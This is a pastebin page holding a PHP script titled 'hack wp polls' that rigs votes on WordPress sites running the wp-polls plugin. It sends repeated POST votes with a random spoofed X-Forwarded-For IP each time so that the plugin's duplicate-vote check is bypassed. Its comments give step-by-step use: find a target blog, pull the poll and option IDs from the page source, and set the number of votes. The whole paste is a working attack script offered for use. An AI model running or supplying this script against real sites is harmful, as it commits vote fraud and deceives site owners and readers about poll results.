ulvis.paste.net - pastebin

Paste Search Dynamic
hack wp polls
  1. <?php
  2. /**
  3.  * Copyright 2009; Dr Small
  4.  *
  5.  * A simple way to increase a specific number of votes on
  6.  * a wp-polls poll. It sets a new IP in the X-Forwarded-For
  7.  * header, every time it executes, dumps cookies to /tmp and
  8.  * doesn't read them the next time around.
  9.  *
  10.  * Howto use:
  11.  *      a) Find a Wordpress blog that uses a wp-polls poll
  12.  *      b) Use the URL as /wp-content/plugins/wp-polls/wp-polls.php
  13.  *      c) View the page source, and find `name="poll_id" value="52"`
  14.  *      d) Use the value as your poll_id
  15.  *      e) Find the value of the specific poll option you want to vote on (i.e, name="poll_52" value="548")
  16.  *      f) Specify how many votes go toward that option (with votes)
  17.  *
  18.  * This same kind of method could be used on almost any kind of poll
  19.  * that does not use "user registration & activation" to vote.
  20.  **/
  21.  
  22. /**
  23.  * name:        Hack wp-polls
  24.  * @param:      url             string          The URL to the plugins/wp-polls/wp-polls.php file
  25.  * @param:      poll_id         int             The Poll ID
  26.  * @param:      poll_value      int             The option being voted on
  27.  * @param:      vote            int             How many times to vote on a given poll (default: 5)
  28.  * @param:      verbose         string          How verbose to be (default: true)
  29.  * @description:                                A proof of concept way to hack wp-polls.
  30.  **/
  31. function hack_wp_polls($url="/fr/wp-content/plugins/wp-polls/wp-polls.php", $poll_id=2, $poll_value=10, $vote=5, $verbose="false"){
  32.  
  33.         // Generate a 4 octive random IP address
  34.         function makeUniqueIP(){
  35.                 srand((double)microtime()*1000000);
  36.                 $ip = rand(1,255).".".rand(0,255).".".rand(0,255).".".rand(1,255);
  37.                 return $ip;
  38.         }
  39.  
  40.         $i = 1;
  41.         while ($i <= $vote){
  42.                 $v .= "starting loop....<br />";
  43.  
  44.                 // Generate a unique value
  45.                 $ip = makeUniqueIP();
  46.                 $v .= "makeUniqueIP() returned $ip<br />";
  47.  
  48.                 // create a new cURL resource
  49.                 $ch = curl_init();
  50.                 $v .= "opening curl resource....<br />";
  51.  
  52.                 // wp-polls may be checking the IP Address of the
  53.                 // user, to make sure he doesn't send data twice;
  54.                 // send a unique IP each time (Wordpress checks X-Forwarded-For)
  55.                 $headerarray = array(
  56.                         "X-Forwarded-For: $ip");
  57.  
  58.                 // The POST data to be sent
  59.                 $postfields = "vote=+++Vote+++&poll_id=$poll_id&poll_$poll_id=$poll_value";
  60.  
  61.                 // set URL and other appropriate options
  62.                 curl_setopt($ch, CURLOPT_URL, $url);
  63.                 $v .= "setting CURLOPT_URL to $url<br />";
  64.  
  65.                 curl_setopt($ch, CURLOPT_HEADER, 0);
  66.                 curl_setopt($ch, CURLOPT_USERAGENT, "cURL bot");
  67.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  68.                 curl_setopt($ch, CURLOPT_HTTPHEADER, $headerarray);
  69.                 curl_setopt($ch, CURLOPT_POST, true);
  70.                 $v .= "setting CURLOPT_POST to true<br />";
  71.  
  72.                 curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
  73.                 $v .= "setting CURLOPT_POSTFIELDS to $postfields<br />";
  74.  
  75.                 curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookiefile.txt');
  76.                 $v .= "setting CURLOPT_COOKIEJAR to /tmp/cookiefile.txt<br />";
  77.  
  78.                 curl_exec($ch);
  79.                 $v .= "executing curl...<br />";
  80.  
  81.                 // close cURL resource, and free up system resources
  82.                 curl_close($ch);
  83.                 $v .= "closing curl resource....<br /><br /><br />";
  84.  
  85.                 // Be verbose, if requested.
  86.                 if ($verbose == "true"){
  87.                         echo $v;
  88.                         $v = '';
  89.                 }
  90.                 $i++;
  91.         }
  92. }
  93.  
  94. if ($_POST[url] && $_POST[poll_id] && $_POST[option] && $_POST[verbose]){
  95.         hack_wp_polls($_POST[url], $_POST[poll_id], $_POST[option], $_POST[votes], $_POST[verbose]);
  96. }  
  97.  
  98. ?>
Parsed in 0.042 seconds